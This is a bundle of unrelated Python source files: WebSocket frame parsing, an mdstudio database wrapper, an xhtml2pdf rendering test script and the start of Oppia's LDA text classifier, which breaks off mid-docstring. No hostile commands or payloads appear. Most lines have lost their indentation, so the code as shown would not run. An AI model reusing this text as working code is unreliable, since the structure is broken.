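# os.urandom so every frame gets a fresh, unpredictable mask key.
def _example_abnf_text_frame():
    frame = ABNF.create_frame(u"hi", ABNF.OPCODE_TEXT)
    frame.get_mask_key = lambda n: b"\x00\x01\x02\x03"
    # First byte 0x81 = FIN bit + text opcode, second byte 0x82 = mask bit +
    # payload length 2, then the 4-byte mask key and the masked payload.
    return frame.format()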
class frame_buffer(object):
_HEADER_MASK_INDEX = 5
    _HEADER_LENGTH_INDEX = 6
def __init__(self, recv_fn, skip_utf8_validation):
self.recv = recv_fn
self.skip_utf8_validation = skip_utf8_validation
        # Buffers the packets received from the layer beneath until the
        # desired number of bytes has been accumulated.
self.recv_buffer = []
self.clear()
def clear(self):
self.header = None
self.length = None
self.mask = None
def has_received_header(self):
return self.header is None
def recv_header(self):
header = self.recv_strict(2)
b1 = header[0]
if six.PY2:
b1 = ord(b1)
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xf
b2 = header[1]
if six.PY2:
b2 = ord(b2)
has_mask = b2 >> 7 & 1
length_bits = b2 & 0x7f
self.header = (fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits)
def has_mask(self):
if not self.header:
return False
return self.header[frame_buffer._HEADER_MASK_INDEX]
def has_received_length(self):
return self.length is None
def recv_length(self):
        bits = self.header[frame_buffer._HEADER_LENGTH_INDEX]
length_bits = bits & 0x7f
if length_bits == 0x7e:
v = self.recv_strict(2)
self.length = struct.unpack("!H", v)[0]
elif length_bits == 0x7f:
v = self.recv_strict(8)
self.length = struct.unpack("!Q", v)[0]
else:
self.length = length_bits
def has_received_mask(self):
return self.mask is None
def recv_mask(self):
self.mask = self.recv_strict(4) if self.has_mask() else ""
def recv_frame(self):
# Header
if self.has_received_header():
self.recv_header()
(fin, rsv1, rsv2, rsv3, opcode, has_mask, _) = self.header
# Frame length
if self.has_received_length():
self.recv_length()
length = self.length
# Mask
if self.has_received_mask():
self.recv_mask()
mask = self.mask
# Payload
payload = self.recv_strict(length)
if has_mask:
payload = ABNF.mask(mask, payload)
# Reset for next frame
self.clear()
frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
frame.validate(self.skip_utf8_validation)
return frame
def recv_strict(self, bufsize):
shortage = bufsize - sum(len(x) for x in self.recv_buffer)
while shortage > 0:
# Limit buffer size that we pass to socket.recv() to avoid
# fragmenting the heap -- the number of bytes recv() actually
# reads is limited by socket buffer and is relatively small,
# yet passing large numbers repeatedly causes lots of large
# buffers allocated and then shrunk, which results in fragmentation.
bytes = self.recv(min(16384, shortage))
self.recv_buffer.append(bytes)
shortage -= len(bytes)
unified = six.b("").join(self.recv_buffer)
if shortage == 0:
self.recv_buffer = []
return unified
else:
self.recv_buffer = [unified[bufsize:]]
return unified[:bufsize]
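# Minimal sketch (illustrative only, not part of the library): decomposing the
# first two header bytes exactly as recv_header() does -- FIN/RSV bits and the
# opcode from byte one, the mask flag and 7-bit length field from byte two.
# For example, (0x81, 0x05) describes a final, unmasked text frame carrying a
# 5-byte payload.
def _example_parse_header_bytes(b1, b2):
    fin = b1 >> 7 & 1
    rsv1 = b1 >> 6 & 1
    rsv2 = b1 >> 5 & 1
    rsv3 = b1 >> 4 & 1
    opcode = b1 & 0xf
    has_mask = b2 >> 7 & 1
    length_bits = b2 & 0x7f
    return fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits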
class continuous_frame(object):
def __init__(self, fire_cont_frame, skip_utf8_validation):
self.fire_cont_frame = fire_cont_frame
self.skip_utf8_validation = skip_utf8_validation
self.cont_data = None
self.recving_frames = None
def validate(self, frame):
if not self.recving_frames and frame.opcode == ABNF.OPCODE_CONT:
raise WebSocketProtocolException("Illegal frame")
if self.recving_frames and frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
raise WebSocketProtocolException("Illegal frame")
def add(self, frame):
if self.cont_data:
self.cont_data[1] += frame.data
else:
if frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
self.recving_frames = frame.opcode
self.cont_data = [frame.opcode, frame.data]
if frame.fin:
self.recving_frames = None
def is_fire(self, frame):
return frame.fin or self.fire_cont_frame
def extract(self, frame):
data = self.cont_data
self.cont_data = None
frame.data = data[1]
if not self.fire_cont_frame and data[0] == ABNF.OPCODE_TEXT and not self.skip_utf8_validation and not validate_utf8(frame.data):
raise WebSocketPayloadException("cannot decode: " + repr(frame.data))
return [data[0], frame]
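# Illustrative sketch (not part of the library): reassembling a fragmented text
# message. The first frame carries OPCODE_TEXT with fin=0, the continuation
# carries OPCODE_CONT with fin=1, and extract() then hands back the full
# payload. The payload bytes are demonstration-only assumptions.
def _example_reassemble_fragments():
    cont = continuous_frame(fire_cont_frame=False, skip_utf8_validation=False)
    first = ABNF(fin=0, opcode=ABNF.OPCODE_TEXT, data=b"hello ")
    second = ABNF(fin=1, opcode=ABNF.OPCODE_CONT, data=b"world")
    for frame in (first, second):
        cont.validate(frame)
        cont.add(frame)
    opcode, full = cont.extract(second)
    return opcode, full.data  # (ABNF.OPCODE_TEXT, b"hello world")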
|
|
# coding=utf-8
import copy
from typing import Dict, Any, List, Optional
from mdstudio.api.context import ContextCallable
from mdstudio.db.sort_mode import SortMode
from mdstudio.db.connection_type import ConnectionType
from mdstudio.db.cursor import Cursor
from mdstudio.db.database import IDatabase, CollectionType, DocumentType, Fields, ProjectionOperators, \
SortOperators, AggregationOperator
from mdstudio.db.index import Index
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
# noinspection PyShadowingBuiltins
class SessionDatabaseWrapper(IDatabase, ContextCallable):
def __init__(self, session, connection_type=ConnectionType.User):
# type: (CommonSession, ConnectionType) -> None
self.session = session # type: CommonSession
self.connection_type = connection_type
ContextCallable.__init__(self, session)
def more(self, cursor_id):
# type: (str) -> Dict[str, Any]
return self._call('more', {
'cursorId': cursor_id
})
def rewind(self, cursor_id):
# type: (str) -> Dict[str, Any]
return self._call('rewind', {
'cursorId': cursor_id
})
def insert_one(self, collection, insert, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'insert': insert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('insert_one', request)
def insert_many(self, collection, insert, fields=None):
# type: (CollectionType, List[DocumentType], Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'insert': insert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('insert_many', request)
def replace_one(self, collection, filter, replacement, upsert=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'replacement': replacement,
'upsert': upsert
}
if fields:
request['fields'] = fields.to_dict()
return self._call('replace_one', request)
def count(self, collection, filter=None, skip=None, limit=None, fields=None, cursor_id=None, with_limit_and_skip=False):
# type: (CollectionType, Optional[DocumentType], Optional[int], Optional[int], Optional[Fields], Optional[str], bool) -> Dict[str, Any]
request = {
'collection': collection
}
# either we use the cursor_id or we start a new query
if cursor_id:
request['cursorId'] = cursor_id
if with_limit_and_skip:
request['withLimitAndSkip'] = with_limit_and_skip
else:
if filter:
request['filter'] = filter
if skip:
request['skip'] = skip
if limit:
request['limit'] = limit
if fields:
request['fields'] = fields.to_dict()
return self._call('count', request)
def update_one(self, collection, filter, update, upsert=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update
}
if upsert:
request['upsert'] = upsert
if fields:
request['fields'] = fields.to_dict()
return self._call('update_one', request)
def update_many(self, collection, filter, update, upsert=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update
}
if upsert:
request['upsert'] = upsert
if fields:
request['fields'] = fields.to_dict()
return self._call('update_many', request)
def find_one(self, collection, filter, projection=None, skip=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], Optional[int], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if skip:
request['skip'] = skip
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one', request)
def find_many(self, collection, filter, projection=None, skip=None, limit=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], Optional[int], Optional[int], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if skip:
request['skip'] = skip
if limit:
request['limit'] = limit
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_many', request)
def find_one_and_update(self, collection, filter, update, upsert=False, projection=None, sort=None,
return_updated=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[ProjectionOperators], SortOperators, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'update': update,
'upsert': upsert,
'returnUpdated': return_updated
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_update', request)
def find_one_and_replace(self, collection, filter, replacement, upsert=False, projection=None, sort=None,
return_updated=False, fields=None):
# type: (CollectionType, DocumentType, DocumentType, bool, Optional[ProjectionOperators], SortOperators, bool, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter,
'replacement': replacement,
'upsert': upsert,
'returnUpdated': return_updated
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_replace', request)
def find_one_and_delete(self, collection, filter, projection=None, sort=None, fields=None):
# type: (CollectionType, DocumentType, Optional[ProjectionOperators], SortOperators, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if projection:
request['projection'] = projection
if sort:
request['sort'] = self._prepare_sortmode(sort)
if fields:
request['fields'] = fields.to_dict()
return self._call('find_one_and_delete', request)
def distinct(self, collection, field, query=None, fields=None):
# type: (CollectionType, str, Optional[DocumentType], Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'field': field
}
if query:
request['query'] = query
if fields:
request['fields'] = fields.to_dict()
return self._call('distinct', request)
def aggregate(self, collection, pipeline):
# type: (CollectionType, List[AggregationOperator]) -> Dict[str, Any]
request = {
'collection': collection,
'pipeline': pipeline
}
return self._call('aggregate', request)
def delete_one(self, collection, filter, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if fields:
request['fields'] = fields.to_dict()
return self._call('delete_one', request)
def delete_many(self, collection, filter, fields=None):
# type: (CollectionType, DocumentType, Optional[Fields]) -> Dict[str, Any]
request = {
'collection': collection,
'filter': filter
}
if fields:
request['fields'] = fields.to_dict()
return self._call('delete_many', request)
    def create_indexes(self, collection, indexes):
        # type: (CollectionType, List[Index]) -> Any
        request_indexes = []
        for i in indexes:
            request_indexes.append(i.to_dict(create=True, to_mongo=False))
        return self._call('create_indexes', {
            'collection': collection,
            'indexes': request_indexes
        })
    def drop_indexes(self, collection, indexes):
        # type: (CollectionType, List[Index]) -> Any
        request_indexes = []
        for i in indexes:
            request_indexes.append(i.to_dict(create=False, name_exclusive=True, to_mongo=False))
        return self._call('drop_indexes', {
            'collection': collection,
            'indexes': request_indexes
        })
def drop_all_indexes(self, collection):
# type: (CollectionType, str) -> Any
db_collection = self._get_collection(collection)
if db_collection:
db_collection.drop_indexes()
@chainable
def make_cursor(self, results, fields):
res = yield results
return_value(Cursor(self, res, fields))
def _prepare_sortmode(self, sort):
if not sort:
return sort
sort = copy.deepcopy(sort)
if isinstance(sort, list):
for i, (name, mode) in enumerate(sort):
sort[i] = [name, str(mode)]
else:
sort = [[sort[0], str(sort[1])]]
return sort
def _call(self, uri, request):
return self.session.call('mdstudio.db.endpoint.{}'.format(uri), request,
claims=self.call_context.get_db_claims(self.connection_type))
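# Illustrative sketch (an assumption, not part of mdstudio): the request dict
# that find_many() would forward to the 'mdstudio.db.endpoint.find_many' call
# for a hypothetical 'users' collection. Optional pieces (projection, skip,
# limit, sort, fields) are only included when provided, and sort modes are
# stringified by _prepare_sortmode into [name, mode] pairs ('asc' below is an
# assumed string form).
_EXAMPLE_FIND_MANY_REQUEST = {
    'collection': 'users',
    'filter': {'group': 'admins'},
    'projection': {'name': 1},
    'skip': 10,
    'limit': 50,
    'sort': [['name', 'asc']]
}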
|
|
#!/usr/bin/env python
from __future__ import print_function
import datetime
import os
import shutil
import sys
import glob
import decimal
from optparse import OptionParser
from subprocess import Popen, PIPE
from xhtml2pdf import pisa
do_bytes = 'b'
if sys.version[0] != '2':
do_bytes = ''
def render_pdf(filename, output_dir, options):
if options.debug:
print('Rendering %s' % filename)
basename = os.path.basename(filename)
outname = '%s.pdf' % os.path.splitext(basename)[0]
outfile = os.path.join(output_dir, outname)
input = open(filename, 'rb')
output = open(outfile, 'wb')
result = pisa.pisaDocument(input, output, path=filename)
input.close()
output.close()
if result.err:
print('Error rendering %s: %s' % (filename, result.err))
sys.exit(1)
return outfile
def convert_to_png(infile, output_dir, options):
if options.debug:
print('Converting %s to PNG' % infile)
basename = os.path.basename(infile)
filename = os.path.splitext(basename)[0]
outname = '%s.page%%0d.png' % filename
globname = '%s.page*.png' % filename
outfile = os.path.join(output_dir, outname)
exec_cmd(options, options.convert_cmd, '-density', '150', infile, outfile)
outfiles = glob.glob(os.path.join(output_dir, globname))
outfiles.sort()
if options.remove_transparencies:
for outfile in outfiles:
            # Convert transparencies to a white background. This is done after
            # the PDF-to-PNG conversion because doing it during that conversion
            # would strip most background colors.
exec_cmd(options, options.convert_cmd, '-background', 'white', '-alpha', 'remove', outfile, outfile)
return outfiles
def create_diff_image(srcfile1, srcfile2, output_dir, options):
if options.debug:
print('Creating difference image for %s and %s' % (srcfile1, srcfile2))
outname = '%s.diff%s' % os.path.splitext(srcfile1)
outfile = os.path.join(output_dir, outname)
_, result = exec_cmd(options, options.compare_cmd, '-metric', 'ae', srcfile1, srcfile2, '-lowlight-color', 'white', outfile)
diff_value = int(float(result.strip()))
if diff_value > 0:
if not options.quiet:
print('Image %s differs from reference, value is %i' % (srcfile1, diff_value))
return outfile, diff_value
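# Illustrative sketch (not part of the test harness): the argument list that
# create_diff_image() hands to exec_cmd(). With '-metric ae' ImageMagick's
# compare tool reports the absolute error (number of differing pixels) on
# stderr, which exec_cmd() returns as its second element, while
# '-lowlight-color white' keeps unchanged areas white in the diff image.
# The file names and the compare_cmd default below are assumptions.
def _example_compare_args(rendered, reference, diff_out,
                          compare_cmd='/usr/bin/compare'):
    return (compare_cmd, '-metric', 'ae', rendered, reference,
            '-lowlight-color', 'white', diff_out)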
def copy_ref_image(srcname, output_dir, options):
if options.debug:
print('Copying reference image %s ' % srcname)
dstname = os.path.basename(srcname)
dstfile = os.path.join(output_dir, '%s.ref%s' % os.path.splitext(dstname))
shutil.copyfile(srcname, dstfile)
return dstfile
def create_thumbnail(filename, options):
thumbfile = '%s.thumb%s' % os.path.splitext(filename)
if options.debug:
print('Creating thumbnail of %s' % filename)
exec_cmd(options, options.convert_cmd, '-resize', '20%', filename, thumbfile)
return thumbfile
def render_file(filename, output_dir, ref_dir, options):
if not options.quiet:
print('Rendering %s' % filename)
pdf = render_pdf(filename, output_dir, options)
pngs = convert_to_png(pdf, output_dir, options)
if options.create_reference:
return None, None, 0
thumbs = [create_thumbnail(png, options) for png in pngs]
pages = [{'png': p, 'png_thumb': thumbs[i]}
for i,p in enumerate(pngs)]
diff_count = 0
if not options.no_compare:
for page in pages:
refsrc = os.path.join(ref_dir, os.path.basename(page['png']))
if not os.path.isfile(refsrc):
print('Reference image for %s not found!' % page['png'])
continue
page['ref'] = copy_ref_image(refsrc, output_dir, options)
page['ref_thumb'] = create_thumbnail(page['ref'], options)
page['diff'], page['diff_value'] = \
create_diff_image(page['png'], page['ref'],
output_dir, options)
page['diff_thumb'] = create_thumbnail(page['diff'], options)
if page['diff_value']:
diff_count += 1
return pdf, pages, diff_count
def exec_cmd(options, *args):
if options.debug:
print('Executing %s' % ' '.join(args))
proc = Popen(args, stdout=PIPE, stderr=PIPE)
result = proc.communicate()
if options.debug:
print(result[0], result[1])
if proc.returncode:
print('exec error (%i): %s' % (proc.returncode, result[1]))
sys.exit(1)
return result[0], result[1]
def create_html_file(results, template_file, output_dir, options):
html = []
for origin_html, pdf, pages, diff_count in results:
if options.only_errors and not diff_count:
continue
pdfname = os.path.basename(pdf)
htmlname = os.path.basename(origin_html)
html.append('<div class="result">\n'
'<h2><a href="%(pdf)s" class="pdf-file">%(pdf)s</a></h2>\n'
'<h2>Generated from <a href="../%(src)s/%(html)s" class="">%(html)s</a></h2>\n'
% {'pdf': pdfname, 'html':htmlname, 'src': options.source_dir})
for i, page in enumerate(pages):
vars = dict(((k, os.path.basename(v)) for k,v in page.items()
if k != 'diff_value'))
vars['page'] = i+1
if 'diff' in page:
vars['diff_value'] = page['diff_value']
if vars['diff_value']:
vars['class'] = 'result-page-diff error'
else:
if options.only_errors:
continue
vars['class'] = 'result-page-diff'
html.append('<div class="%(class)s">\n'
'<h3>Page %(page)i</h3>\n'
'<div class="result-img">\n'
'<div class="result-type">Difference '
'(Score %(diff_value)i)</div>\n'
'<a href="%(diff)s" class="diff-file">'
'<img src="%(diff_thumb)s"/></a>\n'
'</div>\n'
'<div class="result-img">\n'
'<div class="result-type">Rendered</div>\n'
'<a href="%(png)s" class="png-file">'
'<img src="%(png_thumb)s"/></a>\n'
'</div>\n'
'<div class="result-img">\n'
'<div class="result-type">Reference</div>\n'
'<a href="%(ref)s" class="ref-file">'
'<img src="%(ref_thumb)s"/></a>\n'
'</div>\n'
'</div>\n' % vars)
else:
html.append('<div class="result-page">\n'
'<h3>Page %(page)i</h3>\n'
'<div class="result-img">\n'
'<a href="%(png)s" class="png-file">'
'<img src="%(png_thumb)s"/></a>\n'
'</div>\n'
'</div>\n' % vars)
html.append('</div>\n\n')
now = datetime.datetime.now()
    title = 'xhtml2pdf Test Rendering Results (Python %s), %s' % (sys.version, now.strftime('%c'))
template = open(template_file, 'r'+do_bytes).read()
template = template.replace('%%TITLE%%', title)
template = template.replace('%%RESULTS%%', '\n'.join(html))
htmlfile = os.path.join(output_dir, 'index.html')
outfile = open(htmlfile, 'w'+do_bytes)
outfile.write(template)
outfile.close()
return htmlfile
def main():
options, args = parser.parse_args()
base_dir = os.path.abspath(os.path.join(__file__, os.pardir))
source_dir = os.path.join(base_dir, options.source_dir)
if options.create_reference is not None:
output_dir = os.path.join(base_dir, options.create_reference)
else:
output_dir = os.path.join(base_dir, options.output_dir)
template_file = os.path.join(base_dir, options.html_template)
ref_dir = os.path.join(base_dir, options.ref_dir)
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
results = []
diff_count = 0
if len(args) == 0:
files = glob.glob(os.path.join(source_dir, '*.html'))
else:
files = [os.path.join(source_dir, arg) for arg in args]
for filename in files:
pdf, pages, diff = render_file(filename, output_dir, ref_dir, options)
diff_count += diff
results.append((filename, pdf, pages, diff))
num = len(results)
if options.create_reference is not None:
print('Created reference for %i file%s' % (num, '' if num == 1 else 's'))
else:
htmlfile = create_html_file(results, template_file, output_dir, options)
if not options.quiet:
print('Rendered %i file%s' % (num, '' if num == 1 else 's'))
print('%i file%s differ%s from reference' % \
(diff_count, diff_count != 1 and 's' or '',
diff_count == 1 and 's' or ''))
print('Check %s for results' % htmlfile)
if diff_count:
if options.nofail:
print("Differences were found but the error code is suppressed.")
sys.exit(0)
else:
sys.exit(1)
parser = OptionParser(
usage='rendertest.py [options] [source_file] [source_file] ...',
description='Renders a single html source file or all files in the data '
'directory, converts them to PNG format and prepares a result '
'HTML file for comparing the output with an expected result')
parser.add_option('-s', '--source-dir', dest='source_dir', default='data/source',
help=('Path to directory containing the html source files'))
parser.add_option('-o', '--output-dir', dest='output_dir', default='output',
help='Path to directory for output files. CAREFUL: this '
'directory will be deleted and recreated before rendering!')
parser.add_option('-r', '--ref-dir', dest='ref_dir', default='data/reference',
help='Path to directory containing the reference images '
'to compare the result with')
parser.add_option('-t', '--template', dest='html_template',
default='data/template.html', help='Name of HTML template file')
parser.add_option('-e', '--only-errors', dest='only_errors', action='store_true',
default=False, help='Only include images in HTML file which '
'differ from reference')
parser.add_option('-q', '--quiet', dest='quiet', action='store_true',
default=False, help='Try to be quiet')
parser.add_option('-F', '--nofail', dest='nofail', action='store_true',
                  default=False, help="Don't return an error code on failure; "
                  "useful when calling this script from other scripts"
                  )
parser.add_option('-X', '--remove_transparencies', dest='remove_transparencies', action='store_false',
                  default=True, help="Don't try to remove transparent backgrounds. "
                  "Needed for Travis-CI"
                  )
parser.add_option('--no-compare', dest='no_compare', action='store_true',
default=False, help='Do not compare with reference image, '
'only render to png')
parser.add_option('-c', '--create-reference', dest='create_reference',
metavar='DIR',
default=None, help='Do not output anything, render source to '
'specified directory for reference. CAREFUL: this directory '
'will be deleted and recreated before rendering!')
parser.add_option('--debug', dest='debug', action='store_true',
default=False, help='More output for debugging')
parser.add_option('--convert-cmd', dest='convert_cmd', default='/usr/bin/convert',
help='Path to ImageMagick "convert" tool')
parser.add_option('--compare-cmd', dest='compare_cmd', default='/usr/bin/compare',
help='Path to ImageMagick "compare" tool')
if __name__ == '__main__':
main()
|
|
# coding: utf-8
#
# Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classifier for free-form text answers."""
import copy
import numpy
import utils
from core.domain.base_classifier import BaseClassifier
import feconf
class LDAStringClassifier(BaseClassifier):
"""A classifier that uses supervised learning to match free-form text
answers to answer groups. The classifier trains on answers that exploration
editors have assigned to an answer group. Given a new answer, it predicts
the answer group using Latent Dirichlet Allocation
(https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation) with Gibbs
Sampling.
Below is an example workflow for running a batch job that builds a new
classifier and outputs it to a dictionary.
# Examples are formatted as a list. Each element is a doc followed by a
# list of labels.
train_data = [
['i eat fish and vegetables', ['food']],
['fish are pets', ['pets']],
['my kitten eats fish', ['food', 'pets']]
]
classifier = LDAStringClassifier()
classifier.train(train_data)
classifier_dict = classifier.to_dict()
save_to_data_store(classifier_dict)
Below is an example workflow for using an existing classifier to predict a
document's label.
# A list of docs to classify.
prediction_data = [
'i only eat fish and vegetables'
]
classifier_dict = load_from_data_store()
classifier = LDAStringClassifier()
classifier.from_dict(classifier_dict)
labels = classifier.predict(prediction_data)
print labels
Below are some concepts used in this class.
doc - A student free form response, represented as a string of arbitrary
non-whitespace characters (a "word") separated by single spaces.
word - A string of arbitrary non-whitespace characters.
word id - A unique word. Each unique word has one word id that is used
to represent the word in the classifier model.
word instance - An instance of a word id. Each word id can have multiple
instances corresponding to its occurrences in all docs.
label - An answer group that the doc should correspond to. If a doc is
being added to train a model, labels are provided. If a doc is being
added for prediction purposes, no labels are provided. If a doc does
not match any label, the doc should have only one label, '_default'.
label bit vector - A bit vector corresponding to a doc, indexed by label
id. A one in the vector means the label id matches some word instance
in the doc; a zero in the vector means the label id does not match any
word instance in the doc.
example - A doc with a list of labels it should be matched to.
It is possible for a word instance in a doc to not have an explicit label
assigned to it. This is characterized by assigning DEFAULT_LABEL to the
word instance.
"""
# Internal learning rates. These are initialized to Wikipedia's
# recommendations. Do not change these unless you know what you're doing.
_DEFAULT_ALPHA = 0.1
_DEFAULT_BETA = 0.001
_DEFAULT_TRAINING_ITERATIONS = 25
_DEFAULT_PREDICTION_ITERATIONS = 5
_DEFAULT_PREDICTION_THRESHOLD = 0.5
    # Classifiers built with fewer than _DEFAULT_MIN_DOCS_TO_PREDICT docs will
    # likely not be useful for prediction, as there are not enough examples to
    # build a generalized model. The value 20 was chosen as a balance between
    # having a reasonable amount of data to learn from and keeping the barrier
    # to using the classifier low.
_DEFAULT_MIN_DOCS_TO_PREDICT = 20
# Because prediction uses Prob(the doc should be assigned this label | the
# doc is not assigned DEFAULT_LABEL), if there are only two labels (the
# default label and one other) then the one other label will always be
# predicted. Therefore, a minimum of 3 labels are needed to perform a valid
# prediction.
_DEFAULT_MIN_LABELS_TO_PREDICT = 3
def __init__(self):
"""Initializes constants for the classifier.
This class uses index notation with the format "_V_XY", where V is the
element of an array, and X and Y are the indices used to measure V.
https://en.wikipedia.org/wiki/Index_notation
The following maps index notation letters to their meanings:
b - boolean value for whether Y is set in X
c - count of Y's in X
p - position of a value V in X
l - label id
w - word id
d - doc id
"""
super(LDAStringClassifier, self).__init__()
# Setting a seed ensures that results are deterministic.
# There is nothing special about the value 4.
numpy.random.seed(seed=4)
# Internal learning rates.
self._alpha = self._DEFAULT_ALPHA
self._beta = self._DEFAULT_BETA
# Internal model representation. These private attributes should be
# initialized in load_examples() or from_dict().
# Lists of booleans, where each boolean represents whether a
# label is contained within a doc.
self._b_dl = None
# Lists of counts, where each list represents the number of
# word instances assigned to each label in a doc.
self._c_dl = None
# A list of counts, where each count is the number of times a label
# was assigned (aggregated over all word instances in all docs).
self._c_l = None
# Lists of counts, where each list represents the number of
# word instances assigned to each label for a given word id (aggregated
# across all docs).
self._c_lw = None
# Lists of label ids, where each list represents what label
# is assigned to a word instance.
self._l_dp = None
# Lists of word ids, where each list represents a doc.
self._w_dp = None
# A dict which maps labels to their ids.
self._label_to_id = None
# A dict which maps words to their ids.
self._word_to_id = None
# An int which holds the number of docs in the classifier.
self._num_docs = None
# An int which holds the number of labels in the classifier.
self._num_labels = None
# An int which holds the number of words in the classifier.
self._num_words = None
# An int which represents the number of training iterations
# used when adding new training examples.
self._training_iterations = self._DEFAULT_TRAINING_ITERATIONS
# An int which represents the number of prediction iterations
# used when adding new docs for prediction.
self._prediction_iterations = self._DEFAULT_PREDICTION_ITERATIONS
# A float which indicates the level of confidence required
# in order to make a prediction.
self._prediction_threshold = self._DEFAULT_PREDICTION_THRESHOLD
def _get_word_id(self, word):
"""Returns a word's id if it exists, otherwise assigns
a new id to the word and returns it.
"""
if word not in self._word_to_id:
self._word_to_id[word] = self._num_words
self._num_words += 1
return self._word_to_id[word]
def _get_label_id(self, label):
"""Returns a label's id if it exists, otherwise assigns
a new id to the label and returns it.
"""
if label not in self._label_to_id:
self._label_to_id[label] = self._num_labels
self._num_labels += 1
return self._label_to_id[label]
def _get_label_name(self, l):
"""Returns a label's string name given its internal id.
If the id does not have a corresponding name, an exception is
raised.
"""
for label_name, label_id in self._label_to_id.iteritems():
if label_id == l:
return label_name
raise Exception('Label id %d does not exist.' % l)
def _get_doc_with_label_vector(self, d):
"""Given a doc id, return the doc and its label bit vector."""
return self._w_dp[d], self._b_dl[d]
def _get_label_vector(self, labels):
"""Generate and return a label bit vector given a list of labels that
are turned on for the vector.
"""
label_vector = numpy.zeros(self._num_labels)
for label in labels:
label_vector[self._get_label_id(label)] = 1
label_vector[self._label_to_id[feconf.DEFAULT_CLASSIFIER_LABEL]] = 1
return label_vector
def _update_counting_matrices(self, d, w, l, val):
"""Updates counting matrices (ones that begin with _c) when a label
is assigned and unassigned to a word.
"""
self._c_dl[d, l] += val
self._c_lw[l, w] += val
self._c_l[l] += val
def _increment_counting_matrices(self, d, w, l):
"""Updates counting matrices when a label is assigned to a word
instance in a doc.
"""
self._update_counting_matrices(d, w, l, 1)
def _decrement_counting_matrices(self, d, w, l):
"""Updates counting matrices when a label is unassigned from a word
instance in a doc.
"""
self._update_counting_matrices(d, w, l, -1)
def _run_gibbs_sampling(self, doc_ids):
"""Runs one iteration of Gibbs sampling on the provided docs.
The statez variable is used for debugging, and possibly convergence
testing in the future.
"""
if doc_ids is None:
doc_ids = xrange(self._num_docs)
statez = {
'updates': 0,
'computes': 0
}
for d in doc_ids:
doc, labels = self._get_doc_with_label_vector(d)
for p, w in enumerate(doc):
l = self._l_dp[d][p]
self._decrement_counting_matrices(d, w, l)
coeff_a = 1.0 / (
self._c_dl[d].sum() + self._num_labels * self._alpha)
coeff_b = 1.0 / (
self._c_lw.sum(axis=1) + self._num_words * self._beta)
label_probabilities = (
labels *
coeff_a * (self._c_dl[d] + self._alpha) *
coeff_b * (self._c_lw[:, w] + self._beta))
new_label = numpy.random.multinomial(
1,
label_probabilities / label_probabilities.sum()).argmax()
statez['computes'] += 1
if l != new_label:
statez['updates'] += 1
self._l_dp[d][p] = new_label
self._increment_counting_matrices(d, w, new_label)
return statez
def _get_label_probabilities(self, d):
"""Returns a list of label probabilities for a given doc, indexed by
label id.
"""
unnormalized_label_probs = (
self._c_dl[d] + (self._b_dl[d] * self._alpha))
label_probabilities = (
unnormalized_label_probs / unnormalized_label_probs.sum())
return label_probabilities
def _get_prediction_report_for_doc(self, d):
"""Generates and returns a prediction report for a given doc.
The prediction report is a dict with the following keys:
- 'prediction_label_id': the document's predicted label id
- 'prediction_label_name': prediction_label_id's label name
- 'prediction_confidence': the prediction confidence. This is
Prob(the doc should be assigned this label |
the doc is not assigned DEFAULT_LABEL).
- 'all_predictions': a dict mapping each label to
Prob(the doc should be assigned to this label).
Because DEFAULT_LABEL is a special label that captures unspecial
tokens (how ironic), its probability is not a good predicting
indicator. For the current normalization process, it has on
